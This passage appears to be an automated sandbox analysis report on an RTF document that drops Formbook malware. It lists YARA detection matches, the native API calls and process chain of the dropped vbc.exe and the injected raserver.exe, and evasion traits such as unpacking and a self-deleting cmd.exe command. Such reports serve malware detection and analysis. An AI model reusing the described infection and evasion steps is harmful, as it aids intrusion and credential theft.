            Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\Public\vbc.exe Code function: 4_2_0041A360 NtCreateFile,4_2_0041A360
            Source: C:\Users\Public\vbc.exe Code function: 4_2_0041A410 NtReadFile,4_2_0041A410
            Source: C:\Users\Public\vbc.exe Code function: 4_2_0041A490 NtClose,4_2_0041A490
            Source: C:\Users\Public\vbc.exe Code function: 4_2_0041A540 NtAllocateVirtualMemory,4_2_0041A540
            Source: C:\Users\Public\vbc.exe Code function: 4_2_0041A40A NtReadFile,4_2_0041A40A
            Source: C:\Users\Public\vbc.exe Code function: 4_2_0041A53C NtAllocateVirtualMemory,4_2_0041A53C
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A400C4 NtCreateFile,LdrInitializeThunk,4_2_00A400C4
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A40078 NtResumeThread,LdrInitializeThunk,4_2_00A40078
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A40048 NtProtectVirtualMemory,LdrInitializeThunk,4_2_00A40048
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3F9F0 NtClose,LdrInitializeThunk,4_2_00A3F9F0
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3F900 NtReadFile,LdrInitializeThunk,4_2_00A3F900
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FAE8 NtQueryInformationProcess,LdrInitializeThunk,4_2_00A3FAE8
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_00A3FAD0
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FBB8 NtQueryInformationToken,LdrInitializeThunk,4_2_00A3FBB8
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FB68 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00A3FB68
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FC90 NtUnmapViewOfSection,LdrInitializeThunk,4_2_00A3FC90
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FC60 NtMapViewOfSection,LdrInitializeThunk,4_2_00A3FC60
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FD8C NtDelayExecution,LdrInitializeThunk,4_2_00A3FD8C
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FDC0 NtQuerySystemInformation,LdrInitializeThunk,4_2_00A3FDC0
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FEA0 NtReadVirtualMemory,LdrInitializeThunk,4_2_00A3FEA0
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_00A3FED0
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FFB4 NtCreateSection,LdrInitializeThunk,4_2_00A3FFB4
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A410D0 NtOpenProcessToken,4_2_00A410D0
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A40060 NtQuerySection,4_2_00A40060
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A401D4 NtSetValueKey,4_2_00A401D4
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A4010C NtOpenDirectoryObject,4_2_00A4010C
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A41148 NtOpenThread,4_2_00A41148
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A407AC NtCreateMutant,4_2_00A407AC
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3F8CC NtWaitForSingleObject,4_2_00A3F8CC
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A41930 NtSetContextThread,4_2_00A41930
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3F938 NtWriteFile,4_2_00A3F938
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FAB8 NtQueryValueKey,4_2_00A3FAB8
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FA20 NtQueryInformationFile,4_2_00A3FA20
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FA50 NtEnumerateValueKey,4_2_00A3FA50
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FBE8 NtQueryVirtualMemory,4_2_00A3FBE8
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FB50 NtCreateKey,4_2_00A3FB50
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FC30 NtOpenProcess,4_2_00A3FC30
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A40C40 NtGetContextThread,4_2_00A40C40
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FC48 NtSetInformationFile,4_2_00A3FC48
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A41D80 NtSuspendThread,4_2_00A41D80
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FD5C NtEnumerateKey,4_2_00A3FD5C
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FE24 NtWriteVirtualMemory,4_2_00A3FE24
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FFFC NtCreateProcessEx,4_2_00A3FFFC
            Source: C:\Users\Public\vbc.exe Code function: 4_2_00A3FF34 NtQueueApcThread,4_2_00A3FF34
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC00C4 NtCreateFile,LdrInitializeThunk,6_2_01EC00C4
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC07AC NtCreateMutant,LdrInitializeThunk,6_2_01EC07AC
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBF9F0 NtClose,LdrInitializeThunk,6_2_01EBF9F0
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBF900 NtReadFile,LdrInitializeThunk,6_2_01EBF900
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_01EBFBB8
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_01EBFB68
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFB50 NtCreateKey,LdrInitializeThunk,6_2_01EBFB50
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_01EBFAE8
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_01EBFAD0
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFAB8 NtQueryValueKey,LdrInitializeThunk,6_2_01EBFAB8
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_01EBFDC0
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFD8C NtDelayExecution,LdrInitializeThunk,6_2_01EBFD8C
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFC60 NtMapViewOfSection,LdrInitializeThunk,6_2_01EBFC60
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFFB4 NtCreateSection,LdrInitializeThunk,6_2_01EBFFB4
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_01EBFED0
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC01D4 NtSetValueKey,6_2_01EC01D4
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC1148 NtOpenThread,6_2_01EC1148
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC010C NtOpenDirectoryObject,6_2_01EC010C
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC10D0 NtOpenProcessToken,6_2_01EC10D0
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC0060 NtQuerySection,6_2_01EC0060
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC0078 NtResumeThread,6_2_01EC0078
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC0048 NtProtectVirtualMemory,6_2_01EC0048
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBF938 NtWriteFile,6_2_01EBF938
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC1930 NtSetContextThread,6_2_01EC1930
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBF8CC NtWaitForSingleObject,6_2_01EBF8CC
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFBE8 NtQueryVirtualMemory,6_2_01EBFBE8
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFA50 NtEnumerateValueKey,6_2_01EBFA50
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFA20 NtQueryInformationFile,6_2_01EBFA20
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC1D80 NtSuspendThread,6_2_01EC1D80
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFD5C NtEnumerateKey,6_2_01EBFD5C
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFC90 NtUnmapViewOfSection,6_2_01EBFC90
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFC48 NtSetInformationFile,6_2_01EBFC48
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EC0C40 NtGetContextThread,6_2_01EC0C40
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFC30 NtOpenProcess,6_2_01EBFC30
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFFFC NtCreateProcessEx,6_2_01EBFFFC
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFF34 NtQueueApcThread,6_2_01EBFF34
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFEA0 NtReadVirtualMemory,6_2_01EBFEA0
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_01EBFE24 NtWriteVirtualMemory,6_2_01EBFE24
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_000DA360 NtCreateFile,6_2_000DA360
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_000DA410 NtReadFile,6_2_000DA410
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_000DA490 NtClose,6_2_000DA490
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_000DA540 NtAllocateVirtualMemory,6_2_000DA540
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_000DA40A NtReadFile,6_2_000DA40A
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 6_2_000DA53C NtAllocateVirtualMemory,6_2_000DA53C
            Source: vbc[1].exe.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: vbc.exe.1.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: ~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
            Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exe Memory allocated: 76F90000 page execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exe Memory allocated: 76E90000 page execute and read and write
            Source: vbc[1].exe.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: vbc.exe.1.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: 3nkW4MtwSD.rtf Virustotal: Detection: 56%
            Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
            Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
            Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
            Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
            Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$kW4MtwSD.rtf
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCC24.tmp
            Source: classification engine Classification label: mal100.troj.expl.evad.winRTF@10/9@3/2
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
            Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
            Source: explorer.exe, 00000005.00000000.418334987.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: RAServer.pdb^ source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.413553372.0000000000430000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.414513823.00000000008A0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.483444557.0000000000BB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, raserver.exe
            Source: Binary string: RAServer.pdb source: vbc.exe, 00000004.00000003.480095781.00000000007BF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000003.480118689.00000000007CF000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.482732344.00000000007D4000.00000004.00000001.sdmp
            Source: ~WRF{85338F29-7DEE-45E7-AE54-3AA1C7FBE740}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: vbc[1].exe.1.dr, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: vbc.exe.1.dr, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.0.vbc.exe.1090000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 3.2.vbc.exe.1090000.1.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.3.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.10.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.4.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.1.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.0.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.8.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.2.vbc.exe.1090000.5.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.2.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 4.0.vbc.exe.1090000.6.unpack, MegaMan.LevelEditor/MainForm.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041685A push C1F93286h; ret 4_2_0041685F
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D4B5 push eax; ret 4_2_0041D508
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D56C push eax; ret 4_2_0041D572
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D502 push eax; ret 4_2_0041D508
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041D50B push eax; ret 4_2_0041D572
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0041660F push ss; retf 4_2_00416624
            Source: C:\Users\Public\vbc.exeCode function: 4_2_0040B75A push esp; retf 4_2_0040B75C
            Source: C:\Users\Public\vbc.exeCode function: 4_2_00A4DFA1 push ecx; ret 4_2_00A4DFB4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_01ECDFA1 push ecx; ret 6_2_01ECDFB4
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD4B5 push eax; ret 6_2_000DD508
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD50B push eax; ret 6_2_000DD572
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD502 push eax; ret 6_2_000DD508
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000DD56C push eax; ret 6_2_000DD572
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 6_2_000D660F push ss; retf 6_2_000D6624
